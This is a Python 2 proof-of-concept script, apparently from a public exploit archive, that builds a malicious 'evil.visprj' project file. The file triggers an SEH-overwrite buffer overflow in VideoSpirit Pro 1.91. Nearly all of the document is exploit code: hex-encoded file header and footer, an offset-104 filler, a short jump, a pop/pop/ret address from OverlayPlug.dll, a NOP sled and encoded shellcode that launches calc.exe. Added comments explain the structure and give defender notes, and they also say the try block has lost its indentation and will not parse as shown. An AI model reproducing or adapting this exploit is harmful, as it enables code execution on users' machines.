VideoSpirit Pro version 1.91 buffer overflow with SEH bypass exploit.
4a610b7c8fb559b4026157db23297421051705f258bfe8264267c8d6838a889f
#!/usr/bin/python
# Exploit Title: VideoSpirit Pro v1.91
# Date: 27/April/2015
# Author: @evil_comrade IRC freenode: #vulnhub or #offsec or #corelan
# email: kwiha2003@yahoo.com
# Version: 1.91
# Tested on: Win XP3 and Win 7
#Vendor: http://www.verytools.com/
#Software link: http://www.verytools.com/videospirit/download.html
#Greetz: b33f,corelan,offsec,vulnhub,HUST510
# Proof-of-concept generator for the VideoSpirit Pro 1.91 SEH overflow described
# in the header above. It does no network I/O: it only writes a crafted project
# file ("evil.visprj") that the application must be made to open.
#
# Structure of the generated file (decoded from the hex literals below):
#   Header  - the beginning of a .visprj project file, ending in
#             ` name="mp3" value="` so that `buffer` becomes that attribute's value
#   buffer  - 104 bytes of filler, a 4-byte short jump (nSEH), a 4-byte
#             pop/pop/ret address (SEH handler), a NOP sled and the encoded
#             payload, padded out to `buffersize`
#   Footer  - `" />` and the remainder of the project file
#
# Defender notes: the trigger is an attribute value thousands of bytes long inside
# an otherwise small XML-like project file, which is an easy static signature for
# this format. The SEH address below is hard-coded from OverlayPlug.dll (see the
# comment on that line), so the technique presumably depends on that module
# loading at a fixed base on the tested XP/Win7 builds - confirm before relying on
# this as a generalization. This is Python 2 syntax (`print` statements).
#
# Total length of the injected attribute value, including the padding at the end.
buffersize=5000
# Hex-encoded prefix of the project file. Decodes to
# `<version value="3" />\n<track>...<output typename="AVI" ...>` and ends in
# ` name="mp3" value="`, i.e. the very next bytes are the attribute value.
Header=("\x3C\x76\x65\x72\x73\x69\x6F\x6E\x20\x76\x61\x6C\x75\x65\x3D\x22\x33\x22\x20"+
"\x2F\x3E\x0A\x3C\x74\x72\x61\x63\x6B\x3E\x0A\x20\x20\x20\x20\x3C\x74\x79\x70"+
"\x65\x20\x76\x61\x6C\x75\x65\x3D\x22\x30\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20"+
"\x3C\x74\x79\x70\x65\x20\x76\x61\x6C\x75\x65\x3D\x22\x34\x22\x20\x2F\x3E\x0A"+
"\x20\x20\x20\x20\x3C\x74\x79\x70\x65\x20\x76\x61\x6C\x75\x65\x3D\x22\x32\x22"+
"\x20\x2F\x3E\x0A\x20\x20\x20\x20\x3C\x74\x79\x70\x65\x20\x76\x61\x6C\x75\x65"+
"\x3D\x22\x31\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x3C\x74\x79\x70\x65\x20\x76"+
"\x61\x6C\x75\x65\x3D\x22\x37\x22\x20\x2F\x3E\x0A\x3C\x2F\x74\x72\x61\x63\x6B"+
"\x3E\x0A\x3C\x74\x72\x61\x63\x6B\x30\x20\x2F\x3E\x0A\x3C\x74\x72\x61\x63\x6B"+
"\x31\x20\x2F\x3E\x0A\x3C\x74\x72\x61\x63\x6B\x32\x20\x2F\x3E\x0A\x3C\x74\x72"+
"\x61\x63\x6B\x33\x20\x2F\x3E\x0A\x3C\x74\x72\x61\x63\x6B\x34\x20\x2F\x3E\x0A"+
"\x3C\x63\x6C\x69\x70\x20\x2F\x3E\x0A\x3C\x6F\x75\x74\x70\x75\x74\x20\x74\x79"+
"\x70\x65\x6E\x61\x6D\x65\x3D\x22\x41\x56\x49\x22\x20\x6B\x65\x65\x70\x61\x73"+
"\x70\x65\x63\x74\x3D\x22\x30\x22\x20\x70\x72\x65\x73\x65\x74\x71\x75\x61\x6C"+
"\x69\x74\x79\x3D\x22\x30\x22\x3E\x0A\x20\x20\x20\x20\x3C\x74\x79\x70\x65\x30"+
"\x20\x65\x6E\x61\x62\x6C\x65\x3D\x22\x31\x22\x3E\x0A\x20\x20\x20\x20\x20\x20"+
"\x20\x20\x3C\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x6D\x73"+
"\x6D\x70\x65\x67\x34\x76\x32\x22\x20\x76\x61\x6C\x75\x65\x3D\x22\x6D\x73\x6D"+
"\x70\x65\x67\x34\x76\x32\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x20\x20\x20\x20"+
"\x3C\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x33\x32\x30\x2A"+
"\x32\x34\x30\x28\x34\x3A\x33\x29\x22\x20\x76\x61\x6C\x75\x65\x3D\x22\x33\x32"+
"\x30\x2A\x32\x34\x30\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C"+
"\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x33\x30\x22\x20\x76"+
"\x61\x6C\x75\x65\x3D\x22\x33\x30\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x20\x20"+
"\x20\x20\x3C\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x31\x36"+
"\x30\x30\x30\x6B\x22\x20\x76\x61\x6C\x75\x65\x3D\x22\x31\x36\x30\x30\x30\x6B"+
"\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x3C\x2F\x74\x79\x70\x65\x30\x3E\x0A\x20"+
"\x20\x20\x20\x3C\x74\x79\x70\x65\x31\x20\x65\x6E\x61\x62\x6C\x65\x3D\x22\x31"+
"\x22\x3E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x76\x61\x6C\x69\x74\x65\x6D"+
"\x20\x6E\x61\x6D\x65\x3D\x22\x6D\x70\x33\x22\x20\x76\x61\x6C\x75\x65\x3D\x22")
# Filler up to the SEH record: offset 104 is where the overwrite begins.
buffer="A"*104
# Bytes 104..107 (next-SEH slot): a short forward jump followed by two NOPs.
buffer += "\xEB\x07\x90\x90"
#0x100caa30 : pop ebp # pop ecx # ret | {PAGE_EXECUTE_READ} [OverlayPlug.dll]
# Bytes 108..111 (SEH handler slot): the pop/pop/ret address from the comment
# above, little-endian.
buffer +="\x30\xaa\x0C\x10"
# NOP sled in front of the payload.
buffer += "\x90" * 24
#msfpayload windows/exec CMD=calc R|msfencode -b "\x00\x0a\x0d\x21\x22" -t c -e x86/shikata_ga_nai
# Encoded payload produced by the generator command above (it launches calc.exe
# per that command line); the bad-character list is what the encoder avoided.
buffer += ("\xd9\xc3\xba\x97\xfd\x6f\x90\xd9\x74\x24\xf4\x5e\x33\xc9\xb1"
"\x32\x31\x56\x17\x03\x56\x17\x83\x79\x01\x8d\x65\x79\x12\xdb"
"\x86\x81\xe3\xbc\x0f\x64\xd2\xee\x74\xed\x47\x3f\xfe\xa3\x6b"
"\xb4\x52\x57\xff\xb8\x7a\x58\x48\x76\x5d\x57\x49\xb6\x61\x3b"
"\x89\xd8\x1d\x41\xde\x3a\x1f\x8a\x13\x3a\x58\xf6\xdc\x6e\x31"
"\x7d\x4e\x9f\x36\xc3\x53\x9e\x98\x48\xeb\xd8\x9d\x8e\x98\x52"
"\x9f\xde\x31\xe8\xd7\xc6\x3a\xb6\xc7\xf7\xef\xa4\x34\xbe\x84"
"\x1f\xce\x41\x4d\x6e\x2f\x70\xb1\x3d\x0e\xbd\x3c\x3f\x56\x79"
"\xdf\x4a\xac\x7a\x62\x4d\x77\x01\xb8\xd8\x6a\xa1\x4b\x7a\x4f"
"\x50\x9f\x1d\x04\x5e\x54\x69\x42\x42\x6b\xbe\xf8\x7e\xe0\x41"
"\x2f\xf7\xb2\x65\xeb\x5c\x60\x07\xaa\x38\xc7\x38\xac\xe4\xb8"
"\x9c\xa6\x06\xac\xa7\xe4\x4c\x33\x25\x93\x29\x33\x35\x9c\x19"
"\x5c\x04\x17\xf6\x1b\x99\xf2\xb3\xd4\xd3\x5f\x95\x7c\xba\x35"
"\xa4\xe0\x3d\xe0\xea\x1c\xbe\x01\x92\xda\xde\x63\x97\xa7\x58"
"\x9f\xe5\xb8\x0c\x9f\x5a\xb8\x04\xfc\x3d\x2a\xc4\x03")
# Pad the attribute value to exactly `buffersize` bytes.
buffer +="A"*(buffersize - (len(buffer)))
# Hex-encoded remainder of the project file. Starts with `" />` (closing the
# oversized attribute) and ends with `</output>`.
Footer=("\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x76\x61\x6C\x69\x74\x65"+
"\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x31\x32\x38\x6B\x22\x20\x76\x61\x6C\x75\x65\x3D"+
"\x22\x31\x32\x38\x6B\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x76"+
"\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x34\x34\x31\x30\x30\x22\x20"+
"\x76\x61\x6C\x75\x65\x3D\x22\x34\x34\x31\x30\x30\x22\x20\x2F\x3E\x0A\x20\x20\x20"+
"\x20\x20\x20\x20\x20\x3C\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22"+
"\x32\x20\x28\x53\x74\x65\x72\x65\x6F\x29\x22\x20\x76\x61\x6C\x75\x65\x3D\x22\x32"+
"\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x3C\x2F\x74\x79\x70\x65\x31\x3E\x0A\x20\x20"+
"\x20\x20\x3C\x74\x79\x70\x65\x32\x20\x65\x6E\x61\x62\x6C\x65\x3D\x22\x30\x22\x20"+
"\x2F\x3E\x0A\x3C\x2F\x6F\x75\x74\x70\x75\x74\x3E")
# Complete file contents.
sploit = Header + buffer + Footer
# Write the file. Review notes on this block (code left as published):
#  - `file` shadows the builtin of the same name.
#  - "w" is text mode, so the \x0A bytes in Header/Footer are subject to the
#    platform's newline translation; samples generated on different OSes will
#    not hash the same, which matters when comparing IoCs.
#  - `file.close` without parentheses is a bare attribute reference and does not
#    close the handle; CPython closes it on interpreter exit.
#  - the bare `except:` hides the real error (permissions, disk full, ...).
#  - the body lines below carry no indentation in this copy of the script, so it
#    would not parse as-is; presumably lost in extraction.
try:
print "[+]Creating Exploit File...\n"
file = open("evil.visprj","w")
file.write(sploit)
file.close
print "[+]File evil.visprj create successfully.\n"
except:
print "*Failed to create file!!!\n"